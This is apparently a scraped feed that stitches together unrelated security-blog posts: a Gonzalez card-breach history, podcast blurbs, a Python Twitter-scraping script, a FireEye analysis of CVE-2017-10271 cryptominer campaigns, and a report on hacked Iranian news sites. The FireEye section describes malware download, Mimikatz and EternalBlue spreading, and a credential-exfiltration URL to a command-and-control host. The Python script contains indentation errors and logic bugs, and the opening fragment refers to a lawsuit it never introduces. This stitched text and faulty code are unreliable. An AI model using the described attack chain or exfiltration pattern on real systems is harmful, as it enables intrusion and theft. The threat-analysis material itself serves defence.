Billionaire Peter Thiel famously bankrolled a series of lawsuits against Gawker, contributing to the publication’s declaration of bankruptcy and eventual demise. After TechDirt published articles critical of businessman Shiva Ayyadurai, he sued the publication and its founder. The same attorney, Charles Harder, represented both plaintiffs. Last year in June, Sarah Palin filed a lawsuit against the New York Times that was ultimately dismissed which alleged that an editorial mistake was defamation. These are just a few of many recent examples.

From news organizations to nonprofits, those that seek to hold the powerful to account are all too often hit by these lawsuits that drain them of resources and attempt to deflate their work.

SLAPP lawsuits are baseless attempts to mischaracterize constitutionally protected speech and criminalize legitimate political protest, and the suit against Greenpeace should be dismissed immediately. These lawsuits are intended to intimidate critics into silence, and pose a fundamental threat to any advocacy that challenges the powerful.

Drinkman and Smilianets Sentenced: The End to Our Longest Databreach Saga?

On Thursday, February 15, 2018, we may have finally reached the end of the Albert Gonzalez Databreach Saga.  Vladimir Drinkman, age 37, was sentenced to 144 months in prison, after pleading guilty before U.S. District Judge Jerome Simandle in New Jersey.  His colleague, Dmitriy Smilianets, age 34, had also pleased guilty and was sentenced to 51 months and 21 days in prison (which is basically "time served", so he'll walk immediately).  The pair were actually arrested in the Netherlands on June 28, 2012, and the guilty pleas had happened in September 2015th after they were extradited to New Jersey.

Those who follow data breaches will certainly be familiar with Albert Gonzalez, but may not realize how far back his criminal career goes.

On July 24, 2003, the NYPD arrested Gonzalez in front of a Chase Bank ATM at 2219 Broadway found Gonzalez in possession of 15 counterfeit Chase ATM cards and $3,000 in cash. (See case 1:09-cr-00626-JBS).  After that arrest, Gonzalez was taken under the wing of a pair of Secret Service agents, David Esposito and Steve Ward.  Gonzalez describes some of the activities he engaged in during his time as a CI in his 53 page appeal that he files March 24, 2011 from his prison cell in Milan, Michigan.

At one point, he claims that he explained to Agent Ward that he owed a Russian criminal $5,000 and he couldn't afford to pay it.  According to his appeal, he claims Ward told him to "Go do your thing, just don't get caught" and that Agent Ward later asked him if he had "handled it." Because of this, Gonzalez (who again, according to his own sentencing memo, likely has Asperger's) claims he believed that he had permission to hack, as long as he didn't get caught.

Over Christmas 2007, Gonzalez and his crew hacked Heartland Payments Systems and stole around 130 million credit and debit cards.  He was also charged with hacking 7-Eleven (August 2007), Hannaford Brothers (November 2007) where he stole 4.2 million credit and debit cards. Two additional data breaches against "Company A" and "Company B" were also listed as victims.  In Gonzalez's indictment, it refers to "HACKER 1 who resided in or near Russia" and "HACKER 2 who resided in or near Russia."  Another co-conspirator "PT" was later identified as Patrick Toey, a resident of Virginia Beach, VA.  (Patrick Toey's sentencing memorandum is a fascinating document that describes his first "Cash out trip" working for Albert Gonzalez in 2003. Toey describes being a high school drop out who smoked marijuana and drank heavily who was "put on a bus to New York" by his mother to do the cash out run because she needed rent money.  Toey later moved in with Gonzalez in Miami, where he describes hacking Forever 21 "for Gonzalez" among other hacks.

Gonzalez's extracurricular activities caught up with him when Maksym Yastremskiy (AKA Maksik) was arrested in Turkey.  Another point of Gonzalez's appeal was to say that Maksik was tortured by Turkish police, and that without said torture, he never would have confessed, which would have meant that Gonzalez (then acting online as "Segvec") would never have been identified or arrested.  Gonzalez claims that he suffered from an inadequate defense, because his lawyer should have objected to the evidence "obtained under torture."  These charges against Gonzalez were tried in the Eastern District of New York (2:08-cr-00160-SJF-AKT) and proved that Gonzalez was part of the Dave & Buster's data breach

On December 15, 2009, Gonzalez tried to shrug off some of his federal charges by filing a sentencing memo claiming that he lacked the "capacity to knowingly evaluate the wrongfulness of his actions" and asserting that his criminal behavior "was consistent with description of the Asperger's discorder" and that he exhibited characteristics of "Internet addiction."  Two weeks later, after fighting that the court could not conduct their own psychological exam, Gonzalez signed a guilty plea, agreeing that the prosecutor would try to limit his sentence to 17 years. He is currently imprisoned in Yazoo, Mississippi (FBOP # 25702-050) scheduled to be released October 29, 2025.

Eventually "HACKER 1" and "HACKER 2" were indicted themselves in April 2012, with an arrest warrant issued in July 2012, but due to criminals still at large, the indictment was not unsealed until December 18, 2013. HACKER 1 was Drinkman.  HACKER 2 was Alexandr Kalinin, who was also indicted with Drinkman and Smilianets.

Shortly after the Target Data Breach, I created a presentation called "Target Data Breach: Lessons Learned" which drew heavily on the history of Drinkman and Smilianets. Some of their documented data breaches included:
VictimDateDamages
NASDAQMay 2007  loss of control
7-ELEVEN August 2007
Carrefour October 2007 2 million cards
JCPenneyOctober 2007
HannafordNovember 2007 4.2 million cards
Wet SealJanuary 2008
CommideaNovember 2008 30 million cards
Dexia Bank BelgiumFeb'08-Feb'09
Jet BlueJan'08 to Feb '11
Dow Jones2009
EuroNetJul '10 to Oct '11  2 million cards
Visa JordanFeb-Mar '11  800,000 cards
Global Payments SystemsJan '11 to Mar '12
Diners Club SingaporeJun '11
IngenicardMar '12 to Dec '12

During the time of these attacks, Dimitry Smilianets was also leading the video game world.  His team, The Moscow 5, were the "Intel Extreme Masters" champions in the first League of Legends championship, also placing in the CounterStrike category.   Smilianets turned out not to be the hacker, but rather specialized in selling the credit cards that the other team members stole.  Steal a few hundred million credit cards and you can buy a nice gaming rig!

Smilianets with his World Champion League of Legends team in 2012

 How did these databreaches work?


Lockheed Martin's famous paper "Intelligence-Driven Computer Network Defense Informed by Analysis of Adversary Campaigns and Intrusion Kill Chains" laid out the phases of an attack like this:

But my friend Daniel Clemens had explained these same phases to me when he was teaching me the basics of Penetration Testing years before when he was first starting Packet Ninjas!

1. External Recon - Gonzalez and his crew scan for Internet-facing SQL servers
2. Attack (Dan calls this "Establishing a Foothold") - using common SQL configuration weaknesses, they caused a set of additional tools to be downloaded from the Internet
3. Internal Recon - these tools included a Password Dumper, Password Cracker, Port Scanner,  and tools for bulk exporting data
4. Expand (Dan calls this "Creating a Stronghold")  - usually this consisted with monitoring the network until they found a Domain Admin userid and password.  (for example, in the Heartland Payments attack, the VERITAS userid was found to have the password "BACKUP" which unlocked every server on the network!
5. Dominate - Gonzalez' crew would then schedule an SQL script to run a nightly dump their card data
6. Exfiltrate - data sent to remote servers via an outbound FTP.

In Rolling Stone, Gonzalez claims he compromised more than 250 networks
In the Rolling Stone article, "Sex, Drugs, and the Biggest Cybercrime of All Time" , Steven Watt, who was charged in Massachusetts for providing attack tools to Gonzalez in October 2008.  Watt's tools were used in breaches, including BJ's Wholesale Club, Boston Market, Barnes & Noble, Sports Authority, Forever 21, DSW, and OfficeMax.  As part of his sentencing, Watt was ordered to repay $171.5 Million dollars.

Almost all of those databreaches followed the same model ... scan, SQL Inject, download tools, plant a foothold, convert it to a stronghold by becoming a domain admin, dominate the network, and exfiltrate the data. 

How did the TARGET Data breach happen, by the way?  Target is still listed as being "Unsolved" ...   but let's review.  An SQL injection led to downloaded tools, (including NetCat, PSExec, QuarksPWDump, ElcomSoft's Proactive Password Auditor, SomarSoft's DumpSec, Angry IP Scanner (for finding database servers), and Microsoft's OSQL and BCP (Bulk Copy)), a Domain Admin password was found (in Target's case, a BMC server monitoring tool running the default password), the POS Malware was installed, and data exfiltration begun. 

Sound familiar???

Justice?

With most of Gonzalez's crew in prison by 2010, the data breaches kept right on coming, thanks to Drinkman and Smilianets. 

Drinkman, the hacker, was sentenced to 144 months in prison.
Smilianets, the card broker, was sentenced to 51 months and 21 days, which was basically "time served" -- he was extradited to the US on September 7, 2012, so he'll basically walk.

Will Smilianets return to video gaming? to money laundering? or perhaps choose to go straight?

Meanwhile, Alexandr Kalinin, of St. Petersburg, Russia; Mikhail Rytikov, of Odessa, Ukraine; and Roman Kotov, of Moscow, Russia, are all still at large.  Have they learned from the fate of their co-conspirators? or are they in all likelihood, scanning networks for SQL servers, injecting them, dropping tools, planting footholds, creating strongholds, and exfiltrating credit card data from American companies every day?

Kalinin (AKA Grig, AKA "g", AKA "tempo") is wanted for hacking NASDAQ and planting malware that ran on the NASDAQ networks from 2008 to 2010.  (See the indictment in the Southern District of New York, filed 24JUL2013 ==> 1:13-cr-00548-ALC )

Mykhailo Sergiyovych Rytikov is wanted in the Western District of Pennsylvania for his role in a major Zeus malware case.  Rytikov leased servers to other malware operators.  Rytikov is also indicted in the Eastern District of Virginia along with Andriy DERKACH for running a "Dumps Checking Service" that processed at least 1.8 million credit cards in the first half of 2009 and that directly led to more than $12M in fraud.  ( 1:12-cr-00522-AJT filed 08AUG2013.)  Rytikov did have a New York attorney presenting a defense in the case -- Arkady Bukh argues that while Rytikov is definitely involved in web-hosting, he isn't responsible for what happens on the websites he hosts.

Roman Kotov, and Rytikov and Kalinin, are still wanted in New Jersey as part of the case 1:09-cr-00626-JBS (Chief Judge Jerome B. Simandle ). This is the same case Drinkman and Smilianets were just sentenced under.

It’s Just Beautiful – Application Security Weekly #06

This week, Keith and Paul discuss Data Security and Bug Bounty programs! In the news, Lenovo warns of critical Wifi vulnerability, Russian nuclear scientists arrested for Bitcoin mining plot, remote workers outperforming office workers, and more on this episode of Application Security Weekly!

 

Full Show Notes: https://wiki.securityweekly.com/ASW_Episode06

 

Visit https://www.securityweekly.com/asw for all the latest episodes!

Searching Twitter With Twarc

Twarc makes it really easy to search Twitter via the API. Simply create a twarc object using your own API keys and then pass your search query into twarc’s search() function to get a stream of Tweet objects. Remember that, by default, the Twitter API will only return results from the last 7 days. However, this is useful enough if we’re looking for fresh information on a topic.

Since this methodology is so simple, posting code for a tool that simply prints the resulting tweets to stdout would make for a boring blog post. Here I present a tool that collects a bunch of metadata from the returned Tweet objects. Here’s what it does:

  • records frequency distributions of URLs, hashtags, and users
  • records interactions between users and hashtags
  • outputs csv files that can be imported into Gephi for graphing
  • downloads all images found in Tweets
  • records each Tweet’s text along with the URL of the Tweet

The code doesn’t really need explanation, so here’s the whole thing.

from collections import Counter
from itertools import combinations
from twarc import Twarc
import requests
import sys
import os
import shutil
import io
import re
import json

# Helper functions for saving json, csv and formatted txt files
def save_json(variable, filename):
  with io.open(filename, "w", encoding="utf-8") as f:
    f.write(unicode(json.dumps(variable, indent=4, ensure_ascii=False)))

def save_csv(data, filename):
  with io.open(filename, "w", encoding="utf-8") as handle:
    handle.write(u"Source,Target,Weight\n")
    for source, targets in sorted(data.items()):
      for target, count in sorted(targets.items()):
        if source != target and source is not None and target is not None:
          handle.write(source + u"," + target + u"," + unicode(count) + u"\n")

def save_text(data, filename):
  with io.open(filename, "w", encoding="utf-8") as handle:
    for item, count in data.most_common():
      handle.write(unicode(count) + "\t" + item + "\n")

# Returns the screen_name of the user retweeted, or None
def retweeted_user(status):
  if "retweeted_status" in status:
    orig_tweet = status["retweeted_status"]
    if "user" in orig_tweet and orig_tweet["user"] is not None:
      user = orig_tweet["user"]
      if "screen_name" in user and user["screen_name"] is not None:
        return user["screen_name"]

# Returns a list of screen_names that the user interacted with in this Tweet
def get_interactions(status):
  interactions = []
  if "in_reply_to_screen_name" in status:
    replied_to = status["in_reply_to_screen_name"]
    if replied_to is not None and replied_to not in interactions:
      interactions.append(replied_to)
  if "retweeted_status" in status:
    orig_tweet = status["retweeted_status"]
    if "user" in orig_tweet and orig_tweet["user"] is not None:
      user = orig_tweet["user"]
      if "screen_name" in user and user["screen_name"] is not None:
        if user["screen_name"] not in interactions:
          interactions.append(user["screen_name"])
  if "quoted_status" in status:
    orig_tweet = status["quoted_status"]
    if "user" in orig_tweet and orig_tweet["user"] is not None:
      user = orig_tweet["user"]
      if "screen_name" in user and user["screen_name"] is not None:
        if user["screen_name"] not in interactions:
          interactions.append(user["screen_name"])
  if "entities" in status:
    entities = status["entities"]
    if "user_mentions" in entities:
      for item in entities["user_mentions"]:
        if item is not None and "screen_name" in item:
          mention = item['screen_name']
          if mention is not None and mention not in interactions:
            interactions.append(mention)
  return interactions

# Returns a list of hashtags found in the tweet
def get_hashtags(status):
  hashtags = []
  if "entities" in status:
    entities = status["entities"]
    if "hashtags" in entities:
      for item in entities["hashtags"]:
        if item is not None and "text" in item:
          hashtag = item['text']
          if hashtag is not None and hashtag not in hashtags:
            hashtags.append(hashtag)
  return hashtags

# Returns a list of URLs found in the Tweet
def get_urls(status):
  urls = []
  if "entities" in status:
    entities = status["entities"]
      if "urls" in entities:
        for item in entities["urls"]:
          if item is not None and "expanded_url" in item:
            url = item['expanded_url']
            if url is not None and url not in urls:
              urls.append(url)
  return urls

# Returns the URLs to any images found in the Tweet
def get_image_urls(status):
  urls = []
  if "entities" in status:
    entities = status["entities"]
    if "media" in entities:
      for item in entities["media"]:
        if item is not None:
          if "media_url" in item:
            murl = item["media_url"]
            if murl not in urls:
              urls.append(murl)
  return urls

# Main starts here
if __name__ == '__main__':
# Add your own API key values here
  consumer_key=""
  consumer_secret=""
  access_token=""
  access_token_secret=""

  twarc = Twarc(consumer_key, consumer_secret, access_token, access_token_secret)

# Check that search terms were provided at the command line
  target_list = []
  if (len(sys.argv) > 1):
    target_list = sys.argv[1:]
  else:
    print("No search terms provided. Exiting.")
    sys.exit(0)

  num_targets = len(target_list)
  for count, target in enumerate(target_list):
    print(str(count + 1) + "/" + str(num_targets) + " searching on target: " + target)
# Create a separate save directory for each search query
# Since search queries can be a whole sentence, we'll check the length
# and simply number it if the query is overly long
    save_dir = ""
    if len(target) < 30:
      save_dir = target.replace(" ", "_")
    else:
      save_dir = "target_" + str(count + 1)
    if not os.path.exists(save_dir):
      print("Creating directory: " + save_dir)
      os.makedirs(save_dir)
# Variables for capturing stuff
    tweets_captured = 0
    influencer_frequency_dist = Counter()
    mentioned_frequency_dist = Counter()
    hashtag_frequency_dist = Counter()
    url_frequency_dist = Counter()
    user_user_graph = {}
    user_hashtag_graph = {}
    hashtag_hashtag_graph = {}
    all_image_urls = []
    tweets = {}
    tweet_count = 0
# Start the search
    for status in twarc.search(target):
# Output some status as we go, so we know something is happening
      sys.stdout.write("\r")
      sys.stdout.flush()
      sys.stdout.write("Collected " + str(tweet_count) + " tweets.")
      sys.stdout.flush()
      tweet_count += 1
    
      screen_name = None
      if "user" in status:
        if "screen_name" in status["user"]:
          screen_name = status["user"]["screen_name"]

      retweeted = retweeted_user(status)
      if retweeted is not None:
        influencer_frequency_dist[retweeted] += 1
      else:
        influencer_frequency_dist[screen_name] += 1

# Tweet text can be in either "text" or "full_text" field...
      text = None
      if "full_text" in status:
        text = status["full_text"]
      elif "text" in status:
        text = status["text"]

      id_str = None
      if "id_str" in status:
        id_str = status["id_str"]

# Assemble the URL to the tweet we received...
      tweet_url = None
      if "id_str" is not None and "screen_name" is not None:
        tweet_url = "https://twitter.com/" + screen_name + "/status/" + id_str

# ...and capture it
      if tweet_url is not None and text is not None:
        tweets[tweet_url] = text

# Record mapping graph between users
      interactions = get_interactions(status)
        if interactions is not None:
          for user in interactions:
            mentioned_frequency_dist[user] += 1
            if screen_name not in user_user_graph:
              user_user_graph[screen_name] = {}
            if user not in user_user_graph[screen_name]:
              user_user_graph[screen_name][user] = 1
            else:
              user_user_graph[screen_name][user] += 1

# Record mapping graph between users and hashtags
      hashtags = get_hashtags(status)
      if hashtags is not None:
        if len(hashtags) > 1:
          hashtag_interactions = []
# This code creates pairs of hashtags in situations where multiple
# hashtags were found in a tweet
# This is used to create a graph of hashtag-hashtag interactions
          for comb in combinations(sorted(hashtags), 2):
            hashtag_interactions.append(comb)
          if len(hashtag_interactions) > 0:
            for inter in hashtag_interactions:
              item1, item2 = inter
              if item1 not in hashtag_hashtag_graph:
                hashtag_hashtag_graph[item1] = {}
              if item2 not in hashtag_hashtag_graph[item1]:
                hashtag_hashtag_graph[item1][item2] = 1
              else:
                hashtag_hashtag_graph[item1][item2] += 1
          for hashtag in hashtags:
            hashtag_frequency_dist[hashtag] += 1
            if screen_name not in user_hashtag_graph:
              user_hashtag_graph[screen_name] = {}
            if hashtag not in user_hashtag_graph[screen_name]:
              user_hashtag_graph[screen_name][hashtag] = 1
            else:
              user_hashtag_graph[screen_name][hashtag] += 1

      urls = get_urls(status)
      if urls is not None:
        for url in urls:
          url_frequency_dist[url] += 1

      image_urls = get_image_urls(status)
      if image_urls is not None:
        for url in image_urls:
          if url not in all_image_urls:
            all_image_urls.append(url)

# Iterate through image URLs, fetching each image if we haven't already
      print
      print("Fetching images.")
      pictures_dir = os.path.join(save_dir, "images")
      if not os.path.exists(pictures_dir):
        print("Creating directory: " + pictures_dir)
        os.makedirs(pictures_dir)
      for url in all_image_urls:
        m = re.search("^http:\/\/pbs\.twimg\.com\/media\/(.+)$", url)
        if m is not None:
          filename = m.group(1)
          print("Getting picture from: " + url)
          save_path = os.path.join(pictures_dir, filename)
          if not os.path.exists(save_path):
            response = requests.get(url, stream=True)
            with open(save_path, 'wb') as out_file:
              shutil.copyfileobj(response.raw, out_file)
            del response

# Output a bunch of files containing the data we just gathered
      print("Saving data.")
      json_outputs = {"tweets.json": tweets,
                      "urls.json": url_frequency_dist,
                      "hashtags.json": hashtag_frequency_dist,
                      "influencers.json": influencer_frequency_dist,
                      "mentioned.json": mentioned_frequency_dist,
                      "user_user_graph.json": user_user_graph,
                      "user_hashtag_graph.json": user_hashtag_graph,
                      "hashtag_hashtag_graph.json": hashtag_hashtag_graph}
      for name, dataset in json_outputs.iteritems():
        filename = os.path.join(save_dir, name)
        save_json(dataset, filename)

# These files are created in a format that can be easily imported into Gephi
      csv_outputs = {"user_user_graph.csv": user_user_graph,
                     "user_hashtag_graph.csv": user_hashtag_graph,
                     "hashtag_hashtag_graph.csv": hashtag_hashtag_graph}
      for name, dataset in csv_outputs.iteritems():
        filename = os.path.join(save_dir, name)
        save_csv(dataset, filename)

      text_outputs = {"hashtags.txt": hashtag_frequency_dist,
                      "influencers.txt": influencer_frequency_dist,
                      "mentioned.txt": mentioned_frequency_dist,
                      "urls.txt": url_frequency_dist}
      for name, dataset in text_outputs.iteritems():
        filename = os.path.join(save_dir, name)
        save_text(dataset, filename)

Running this tool will create a directory for each search term provided at the command-line. To search for a sentence, or to include multiple terms, enclose the argument with quotes. Due to Twitter’s rate limiting, your search may hit a limit, and need to pause to wait for the rate limit to reset. Luckily twarc takes care of that. Once the search is finished, a bunch of files will be written to the previously created directory.

Since I use a Mac, I can use its Quick Look functionality from the Finder to browse the output files created. Since pytorch is gaining a lot of interest, I ran my script against that search term. Here’s some examples of how I can quickly view the output files.

The preview pane is enough to get an overview of the recorded data.

 

Pressing spacebar opens the file in Quick Look, which is useful for data that doesn’t fit neatly into the preview pane

Importing the user_user_graph.csv file into Gephi provided me with some neat visualizations about the pytorch community.

A full zoom out of the pytorch community

Here we can see who the main influencers are. It seems that Yann LeCun and François Chollet are Tweeting about pytorch, too.

Here’s a zoomed-in view of part of the network.

Zoomed in view of part of the Gephi graph generated.

If you enjoyed this post, check out the previous two articles I published on using the Twitter API here and here. I hope you have fun tailoring this script to your own needs!

They Stole My Shoes – Paul’s Security Weekly #548

This week, Steve Tcherchian, CISO and Director of Product Management of XYPRO Technology joins us for an interview! In our second feature interview, Paul speaks with Michael Bazzell, OSINT & Privacy Consultant! In the news, we have updates from Google, Bitcoin, NSA, Microsoft, and more on this episode of Paul's Security Weekly!

Full Show Notes: https://wiki.securityweekly.com/Episode548

 

Visit https://www.securityweekly.com/psw for all the latest episodes!

CVE-2017-10271 Used to Deliver CryptoMiners: An Overview of Techniques Used Post-Exploitation and Pre-Mining

Introduction

FireEye researchers recently observed threat actors abusing CVE-2017-10271 to deliver various cryptocurrency miners.

CVE-2017-10271 is a known input validation vulnerability that exists in the WebLogic Server Security Service (WLS Security) in Oracle WebLogic Server versions 12.2.1.2.0 and prior, and attackers can exploit it to remotely execute arbitrary code. Oracle released a Critical Patch Update that reportedly fixes this vulnerability. Users who failed to patch their systems may find themselves mining cryptocurrency for threat actors.

FireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public posting of proof of concept code in December 2017. Attackers then leveraged this vulnerability to download cryptocurrency miners in victim environments.

We saw evidence of organizations located in various countries – including the United States, Australia, Hong Kong, United Kingdom, India, Malaysia, and Spain, as well as those from nearly every industry vertical – being impacted by this activity. Actors involved in cryptocurrency mining operations mainly exploit opportunistic targets rather than specific organizations. This coupled with the diversity of organizations potentially affected by this activity suggests that the external targeting calculus of these attacks is indiscriminate in nature.

The recent cryptocurrency boom has resulted in a growing number of operations – employing diverse tactics – aimed at stealing cryptocurrencies. The idea that these cryptocurrency mining operations are less risky, along with the potentially nice profits, could lead cyber criminals to begin shifting away from ransomware campaigns.

Tactic #1: Delivering the miner directly to a vulnerable server

Some tactics we've observed involve exploiting CVE-2017-10271, leveraging PowerShell to download the miner directly onto the victim’s system (Figure 1), and executing it using ShellExecute().


Figure 1: Downloading the payload directly

Tactic #2: Utilizing PowerShell scripts to deliver the miner

Other tactics involve the exploit delivering a PowerShell script, instead of downloading the executable directly (Figure 2).


Figure 2: Exploit delivering PowerShell script

This script has the following functionalities:

  • Downloading miners from remote servers


Figure 3: Downloading cryptominers

As shown in Figure 3, the .ps1 script tries to download the payload from the remote server to a vulnerable server.

  • Creating scheduled tasks for persistence


Figure 4: Creation of scheduled task

  • Deleting scheduled tasks of other known cryptominers


Figure 5: Deletion of scheduled tasks related to other miners

In Figure 4, the cryptominer creates a scheduled task with name “Update service for Oracle products1”.  In Figure 5, a different variant deletes this task and other similar tasks after creating its own, “Update service for Oracle productsa”.  

From this, it’s quite clear that different attackers are fighting over the resources available in the system.

  • Killing processes matching certain strings associated with other cryptominers


Figure 6: Terminating processes directly


Figure 7: Terminating processes matching certain strings

Similar to scheduled tasks deletion, certain known mining processes are also terminated (Figure 6 and Figure 7).

  • Connects to mining pools with wallet key


Figure 8: Connection to mining pools

The miner is then executed with different flags to connect to mining pools (Figure 8). Some of the other observed flags are: -a for algorithm, -k for keepalive to prevent timeout, -o for URL of mining server, -u for wallet key, -p for password of mining server, and -t for limiting the number of miner threads.

  • Limiting CPU usage to avoid suspicion


Figure 9: Limiting CPU Usage

To avoid suspicion, some attackers are limiting the CPU usage of the miner (Figure 9).

Tactic #3: Lateral movement across Windows environments using Mimikatz and EternalBlue

Some tactics involve spreading laterally across a victim’s environment using dumped Windows credentials and the EternalBlue vulnerability (CVE-2017-0144).

The malware checks whether its running on a 32-bit or 64-bit system to determine which PowerShell script to grab from the command and control (C2) server. It looks at every network adapter, aggregating all destination IPs of established non-loopback network connections. Every IP address is then tested with extracted credentials and a credential-based execution of PowerShell is attempted that downloads and executes the malware from the C2 server on the target machine. This variant maintains persistence via WMI (Windows Management Instrumentation).

The malware also has the capability to perform a Pass-the-Hash attack with the NTLM information derived from Mimikatz in order to download and execute the malware in remote systems.

Additionally, the malware exfiltrates stolen credentials to the attacker via an HTTP GET request to: 'http://<C2>:8000/api.php?data=<credential data>'.

If the lateral movement with credentials fails, then the malware uses PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to scan that particular host to determine if its vulnerable to EternalBlue, and uses it to spread to that host.

After all network derived IPs have been processed, the malware generates random IPs and uses the same combination of PingCastle and EternalBlue to spread to that host.

Tactic #4: Scenarios observed in Linux OS

We’ve also observed this vulnerability being exploited to deliver shell scripts (Figure 10) that have functionality similar to the PowerShell scripts.


Figure 10: Delivery of shell scripts

The shell script performs the following activities:

  • Attempts to kill already running cryptominers


Figure 11: Terminating processes matching certain strings

  • Downloads and executes cryptominer malware


Figure 12: Downloading CryptoMiner

  • Creates a cron job to maintain persistence


Figure 13: Cron job for persistence

  • Tries to kill other potential miners to hog the CPU usage


Figure 14: Terminating other potential miners

The function shown in Figure 14 is used to find processes that have high CPU usage and terminate them. This terminates other potential miners and maximizes the utilization of resources.

Conclusion

Use of cryptocurrency mining malware is a popular tactic leveraged by financially-motivated cyber criminals to make money from victims. We’ve observed one threat actor mining around 1 XMR/day, demonstrating the potential profitability and reason behind the recent rise in such attacks. Additionally, these operations may be perceived as less risky when compared to ransomware operations, since victims may not even know the activity is occurring beyond the slowdown in system performance.

Notably, cryptocurrency mining malware is being distributed using various tactics, typically in an opportunistic and indiscriminate manner so cyber criminals will maximize their outreach and profits.

FireEye HX, being a behavior-based solution, is not affected by cryptominer tricks. FireEye HX detects these threats at the initial level of the attack cycle, when the attackers attempt to deliver the first stage payload or when the miner tries to connect to mining pools.

At the time of writing, FireEye HX detects this activity with the following indicators:

Detection Name

POWERSHELL DOWNLOADER (METHODOLOGY)

MONERO MINER (METHODOLOGY)

MIMIKATZ (CREDENTIAL STEALER)

Indicators of Compromise

MD5

Name

3421A769308D39D4E9C7E8CAECAF7FC4

cranberry.exe/logic.exe

B3A831BFA590274902C77B6C7D4C31AE

xmrig.exe/yam.exe

26404FEDE71F3F713175A3A3CEBC619B

1.ps1

D3D10FAA69A10AC754E3B7DDE9178C22

2.ps1

9C91B5CF6ECED54ABB82D1050C5893F2

info3.ps1

3AAD3FABF29F9DF65DCBD0F308FF0FA8

info6.ps1

933633F2ACFC5909C83F5C73B6FC97CC

lower.css

B47DAF937897043745DF81F32B9D7565

lib.css

3542AC729035C0F3DB186DDF2178B6A0

bootstrap.css

Thanks to Dileep Kumar Jallepalli and Charles Carmakal for their help in the analysis.

Happy Valentine’s Day – Enterprise Security Weekly #80

This week, Paul and John are accompanied by Guy Franco, Security Consultant for Javelin Networks, who will deliver a Technical Segment on Domain Persistence! In the news, we have updates from ServerSide, Palo Alto, NopSec, Microsoft, and more on this episode of Enterprise Security Weekly!  

 

Full Show Notes: https://wiki.securityweekly.com/ES_Episode80

 

Visit https://www.securityweekly.com/esw for all the latest episodes!

SamSam: Converting Opportunity into Profit

Threat actors continue to use opportunistic attacks to compromise networks and deploy SamSam ransomware to collect money from various types of organizations.


Category:

CTU Research
Information Security
Leadership Insights

Threat actors continue to use opportunistic attacks to compromise networks and deploy SamSam ransomware to collect money from various types of organizations.

What Developers Can Learn at the Upcoming DevSecOps Virtual Summit

The shift to DevOps and DevSecOps has already happened, it's only a question of when we all catch up. Organizations in all industries are creating software not only faster, but also in more precise, collaborative and incremental ways than ever before. In fact, we’ve seen the shift in our own customer base, where the percentage of applications scanned for security on a weekly basis jumped 50 percent last year. And this shift casts a wide net, affecting everything from policies to training and tools. In turn, DevSecOps has a major implication for the development professional’s role in securing the software development process. With security’s shift left, and into the hands of the developer, the security team is no longer responsible for conducting security testing, but for enabling developers. Get a handle on this shift and what it means for you by attending our Virtual Summit, Assembling the Pieces of the DevSecOps Puzzle, on February 28. You’ll get practical tips and advice on a developer’s role in a DevSecOps world, including:

Shifting Left With Integrations 

You may feel like you play a small or even no role in choosing and implementing security testing tools. But thanks to recent trends, any security tools that do not integrate seamlessly with current developer processes and workflows will be seen as disruptive and slow. Do you know who in your organization is choosing which tools are used? Developers can proactively champion tools that will work with the technology they're already using to gain valuable synergy with security teams and ensure all code is secured as early in the lifecycle as possible. This session will help you understand how, where, and when application security fits into a modern development organization.

Avoid Release Slowdowns With Security Champions 

DevSecOps is about speed and precision, yet security is often seen by development managers as a training burden or blocking issue. There just aren’t enough security experts to go around. But how do you support all of the development teams? What if I told you that through careful selection and good training it is possible to build your own army from the very people who own the development process? Attend this session to learn dos and don'ts from someone who has done it before.

Why Developer Security Training Is Worth Doing and How It Can Be Implemented

Most developers have little to no formal security training, in fact - less than one in four were required to take a single college course on security. But CA Veracode scan data shows that developer training can have a significant impact on code quality, with eLearning leading to a 19% improvement in fix rates, and Remediation Coaching improving fix rates by 88%. In this session you’ll get actionable advice from our own VP of Engineering on how to boost your own developers’ secure coding skills.

Make Security a Skill in Your Set: Attend our upcoming Virtual Summit to hear practical tips and advice on these topics and more from experts who have been, or are, practitioners – they’ve been there, and have invaluable insights and experience to share.

Sessions cover topics such as:

  • How to tweak application security policies to not slow DevOps.
  • Why security champions are important and how to develop them.
  • The role of developer security training in DevOps and best practices for implementing it.
  • How to shift security left by integrating security tools into existing tools and processes.

Get all the Summit details here. Ready to sign up? Reserve your seat today.

On the Anniversary of the Islamic Revolution, 30 Iranian News sites hacked to show death of Ayatollah Khamenei

February 11th marked the 39th aniversary of the Islamic Revolution in Iran, the day when the Shah was overthrown and the government replaced by the Ayatollah Khomeini, called "The Supreme Leader" of Iran.  February 10th marked something quite different -- the day when hackers gained administrative control of more than 30 Iranian news websites and used stolen credentials to login to their Content Management Systems (CMS) and share a fake news article -- the death of Ayatollah Khamenei.

The Iranian Ministry of Communications and Information Technology shared the results of their investigation via the Iranian CERT (certcc.ir) which has announced the details of the hack in this PDF report.  All of the websites in question, which most famously included ArmanDaily.ir, were hosted on the same platform, a Microsoft IIS webserver running ASP.net.

Most of the thirty hacked websites were insignificant as far as global traffic is concerned.  But several are quite popular.  We evaluated each site listed by CERTCC.ir by looking up its Alexa ranking.  Alexa tracks the popularity of all websites on the Internet.  Three of the sites are among the 100,000 most popular websites on the Internet.


NewsSiteAlexa Ranking
SharghDaily.ir33,153
NoavaranOnline.ir43,737
GhanoonDaily.ir79,955
Armandaily.ir104,175
BankVarzesh.com146,103
EtemadNewspaper.ir148,450
BaharDaily.ir410,358
KaroonDaily.ir691,550
TafahomNews.com1,380,579
VareshDaily.ir1,435,862
NimnegahShiraz.ir2,395,969
TWeekly.ir2,993,755
NishKhat.ir3,134,287
neyrizanfars.ir3,475,281
Asreneyriz.ir7,820,850
Ecobition.ir8,819,111
saraFrazanNews.ir9,489,254
DavatOnline.ir9,612,775

These rankings would put the online leadership for the top news sites listed as similar to a mid-sized American newspaper.  For example, the Fort Worth Star-Telegram ranks 31,375, while the Springfield, Illinois State Journal-Register is 84,882.  (For more examples, the Boston Globe is 4,656, while the New York Times is #111.)

Hacked Sites not listed by Alexa among the top ten million sites on the Internet included: Aminehamee.ir, armanmeli.ir, Baharesalamat.ir, bighanooonline.ir, hadafeconomic.ir, kaenta.ir, naghshdaily.ir, niloofareabi.ir, sayehnews.com, setarezobh.ir, shahresabzeneyriz.ir.

CERTCC.ir's report notes that the primary explanation of the attack is that all of the attacked news sites have "the default user name and password of the backup company" and a "high-level" gmail.com email account with the same username and password had permissions to all sites.

